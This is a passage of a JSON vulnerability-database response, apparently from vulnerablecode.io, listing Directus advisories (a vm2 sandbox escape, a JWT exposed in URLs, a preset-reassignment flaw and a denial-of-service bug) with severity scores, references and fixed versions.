"https://github.com/directus/directus/pull/23716", "reference_id": "23716", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", 
"scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/pull/23716" }, { "reference_url": "https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804", "reference_id": "e288a43a79613dada905da683f4919c6965ac804", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804" }, { "reference_url": "https://github.com/advisories/GHSA-pmf4-v838-29hg", "reference_id": "GHSA-pmf4-v838-29hg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pmf4-v838-29hg" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg", "reference_id": "GHSA-pmf4-v838-29hg", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg" }, { "reference_url": 
"https://github.com/directus/directus/releases/tag/v11.2.0", "reference_id": "v11.2.0", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.2.0" }, { "reference_url": "https://www.youtube.com/watch?v=DbV4IxbWzN4", "reference_id": "watch?v=DbV4IxbWzN4", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://www.youtube.com/watch?v=DbV4IxbWzN4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/376928?format=api", "purl": "pkg:npm/directus@11.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": 
"VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-ghbw-eqaz-jqhs" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0" } ], "aliases": [ "CVE-2025-24353", "GHSA-pmf4-v838-29hg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gf4m-ad8j-7bbn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360871?format=api", "vulnerability_id": "VCID-jvtg-cnnb-7ubg", "summary": "Directus affected by VM2 sandbox escape vulnerability\n### Impact\nIn vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. 
Within Directus this applies to the \"Run Script\" operation in flows being able to escape the sandbox running code in the main nodejs context.\n\n### Patches\nPatched in v10.6.0 by replacing `vm2` with `isolated-vm`\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5", "references": [ { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058" }, { "reference_url": "https://github.com/directus/directus/pull/19332", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/pull/19332" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], 
"url": "https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8" }, { "reference_url": "https://github.com/advisories/GHSA-22rr-f3p8-5gf8", "reference_id": "GHSA-22rr-f3p8-5gf8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-22rr-f3p8-5gf8" }, { "reference_url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5", "reference_id": "GHSA-cchq-frgv-rjh5", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/32458?format=api", "purl": "pkg:npm/directus@10.6.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-nupg-ae85-dqaw" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { 
"vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0" } ], "aliases": [ "GHSA-22rr-f3p8-5gf8", "GMS-2023-2358" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jvtg-cnnb-7ubg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/39732?format=api", "vulnerability_id": "VCID-jy2x-jbbb-zua5", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. This issue has been addressed in version 10.10.0. Users are advised to upgrade. 
There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28238", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25791", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25775", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25577", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28238" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28238", "reference_id": "CVE-2024-28238", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28238" }, { "reference_url": "https://github.com/advisories/GHSA-2ccr-g2rv-h677", "reference_id": "GHSA-2ccr-g2rv-h677", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2ccr-g2rv-h677" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677", "reference_id": "GHSA-2ccr-g2rv-h677", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", 
"scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29718?format=api", "purl": "pkg:npm/directus@10.10.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pt9-wpk9-tfhj" }, { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, 
{ "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0" } ], "aliases": [ "CVE-2024-28238", "GHSA-2ccr-g2rv-h677" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jy2x-jbbb-zua5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50303?format=api", "vulnerability_id": "VCID-pvfa-xp3e-8kg2", "summary": "Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-6534", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.1854", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18518", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18356", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18519", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-6534" }, { "reference_url": "https://directus.io", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": 
"" } ], "url": "https://directus.io" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://fluidattacks.com/advisories/capaldi", "reference_id": "capaldi", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/" } ], "url": "https://fluidattacks.com/advisories/capaldi" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534", "reference_id": "CVE-2024-6534", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534" }, { "reference_url": "https://directus.io/", "reference_id": "directus.io", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/" } ], "url": "https://directus.io/" }, { "reference_url": "https://github.com/advisories/GHSA-3fff-gqw3-vj86", "reference_id": "GHSA-3fff-gqw3-vj86", "reference_type": "", "scores": [ { "value": 
"MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3fff-gqw3-vj86" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86", "reference_id": "GHSA-3fff-gqw3-vj86", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33133?format=api", "purl": "pkg:npm/directus@10.13.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": 
"VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2" } ], "aliases": [ "CVE-2024-6534", "GHSA-3fff-gqw3-vj86" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pvfa-xp3e-8kg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41764?format=api", "vulnerability_id": "VCID-qeh1-cm33-93g1", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 10.11.2, providing a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID. 
This vulnerability is fixed in 10.11.2.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-36128", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58146", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58141", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58028", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58158", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-36128" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b", "reference_id": "7d2a1392f43613094de700062aba168a9400dd3b", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/" } ], "url": "https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36128", "reference_id": "CVE-2024-36128", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": 
"HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36128" }, { "reference_url": "https://github.com/advisories/GHSA-632p-p495-25m5", "reference_id": "GHSA-632p-p495-25m5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-632p-p495-25m5" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5", "reference_id": "GHSA-632p-p495-25m5", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/31918?format=api", "purl": "pkg:npm/directus@10.11.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { 
